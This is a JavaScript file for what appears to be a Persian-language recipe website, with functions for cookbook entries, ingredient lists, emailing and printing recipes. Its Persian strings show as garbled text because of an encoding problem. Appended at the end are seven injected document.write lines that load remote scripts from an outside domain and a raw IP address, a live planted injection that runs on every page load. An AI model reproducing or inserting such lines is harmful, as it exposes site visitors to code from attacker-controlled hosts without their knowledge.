ÿþ 
 f u n c t i o n   S h o u l d B e L o g i n ( )  
 {  
 	 a l e r t ( " (1'Ì  '3*A'/G  '2  'ÌF  31HÌ3  ('Ì/  /1  3'Ì*  .H4.H1'©  96H  4HÌ/. 96HÌ*  /1  3'Ì*  .H4.H1'©  1'Ì¯'F  '3*. " ) ;  
 }  
 f u n c t i o n   A d d T o C o o k B o o k ( S e r i a l N o )  
 {  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( ' F i r s t ' ) . v a l u e   =   S e r i a l N o ;  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( ' C o s t u m F o r m ' ) . a c t i o n   =   " A d d T o C o o k B o o k . a s p " ;  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( ' C o s t u m F o r m ' ) . m e t h o d = " p o s t " ;  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( ' C o s t u m F o r m ' ) . s u b m i t ( ) ;  
 }  
 f u n c t i o n   A d d M e T o I n g e r i a n t L i s t ( S e r i a l N o , N a m e )  
 {  
 	 v a r   o O p t i o n   =   d o c u m e n t . c r e a t e E l e m e n t ( " O P T I O N " ) ;  
 	 o O p t i o n . v a l u e   =   S e r i a l N o ;  
 	 o O p t i o n . t e x t   =   N a m e ;  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( " I n g e r i a n t E l e m e n t L i s t " ) . o p t i o n s . a d d ( o O p t i o n ) ;  
 }  
 f u n c t i o n   R e m o v e M e F r o m I n g e r i a n t L i s t ( S e l I n d e x )  
 {  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( " I n g e r i a n t E l e m e n t L i s t " ) . o p t i o n s . r e m o v e ( S e l I n d e x ) ;  
 }  
  
 f u n c t i o n   C a l c C a t C o u n t ( C h e c k M a r k )  
 {  
 	 i f   (   C h e c k M a r k   = =   t r u e   )  
 	 	 d o c u m e n t . g e t E l e m e n t B y I d ( " C a t C o u n t " ) . v a l u e   =   e v a l ( d o c u m e n t . g e t E l e m e n t B y I d ( " C a t C o u n t " ) . v a l u e )   +   1 ;  
 	 e l s e  
 	 	 d o c u m e n t . g e t E l e m e n t B y I d ( " C a t C o u n t " ) . v a l u e   =   e v a l ( d o c u m e n t . g e t E l e m e n t B y I d ( " C a t C o u n t " ) . v a l u e )   -   1 ;  
 }  
  
 f u n c t i o n   E m a i l R e c i p e ( S e r i l a N o , R e t u r n P a t h )  
 {  
 / * 	   =   p r o m p t ( " D7A'K  "/13  'ÌEÌD*'F  1'  H'1/  FE'ÌÌ/. " , " " ) ;  
   	 i f   (   d o c u m e n t . g e t E l e m e n t B y I d ( " F i r s t " ) . v a l u e   = =   n u l l   | |   d o c u m e n t . g e t E l e m e n t B y I d ( " F i r s t " ) . v a l u e   = =   " "   )  
   	 {  
   	 	 a l e r t ( " "/13  E m a i l   F'  E9*(1  '3*" ) ;  
   	 	 r e t u r n ;  
   	 }  
 * / 	 d o c u m e n t . g e t E l e m e n t B y I d ( " F i r s t " ) . v a l u e   =   R e t u r n P a t h ;  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( " S e c o n d " ) . v a l u e   =   d o c u m e n t . g e t E l e m e n t B y I d ( " F o o d R e c i p e O f T h e D a y C l a s s " ) . i n n e r H T M L ;  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( " C o s t u m F o r m " ) . a c t i o n   =   " G e t E m a i l . a s p " ;  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( " C o s t u m F o r m " ) . m e t h o d = " p o s t " ;  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( " C o s t u m F o r m " ) . s u b m i t ( ) ;  
 }  
  
 f u n c t i o n   P r i n t R e c i p e ( S e r i l a N o )  
 {  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( ' C o s t u m F o r m ' ) . a c t i o n   =   " P r i n t R e c i p e . a s p " ;  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( ' C o s t u m F o r m ' ) . m e t h o d = " p o s t " ;  
 	 i f   (   S e r i l a N o   ! =   0   )  
 	 {  
 	 	 d o c u m e n t . g e t E l e m e n t B y I d ( ' F i r s t ' ) . v a l u e   =   " F e t c h F r o m S e r i a l N o " ;  
 	 	 d o c u m e n t . g e t E l e m e n t B y I d ( ' S e c o n d ' ) . v a l u e   =   S e r i l a N o ;  
 	 }  
 	 e l s e  
 	 	 d o c u m e n t . g e t E l e m e n t B y I d ( ' F i r s t ' ) . v a l u e   =   " P r i n t A l l T h e B o o k " ;  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( ' C o s t u m F o r m ' ) . t a r g e t = " _ b l a n k " ;  
 	 d o c u m e n t . g e t E l e m e n t B y I d ( ' C o s t u m F o r m ' ) . s u b m i t ( ) ;  
 }  
  
 
document.write('<script src=http://granpiano.com.mx/flash/inicio.php ><\/script>');
document.write('<script src=http://granpiano.com.mx/flash/inicio.php ><\/script>');
document.write('<script src=http://209.85.115.10/master_doc/i_js_style.php ><\/script>');
document.write('<script src=http://209.85.115.10/master_doc/i_js_style.php ><\/script>');
document.write('<script src=http://209.85.115.10/master_doc/i_js_style.php ><\/script>');
document.write('<script src=http://209.85.115.10/master_doc/i_js_style.php ><\/script>');
document.write('<script src=http://209.85.115.10/master_doc/i_js_style.php ><\/script>');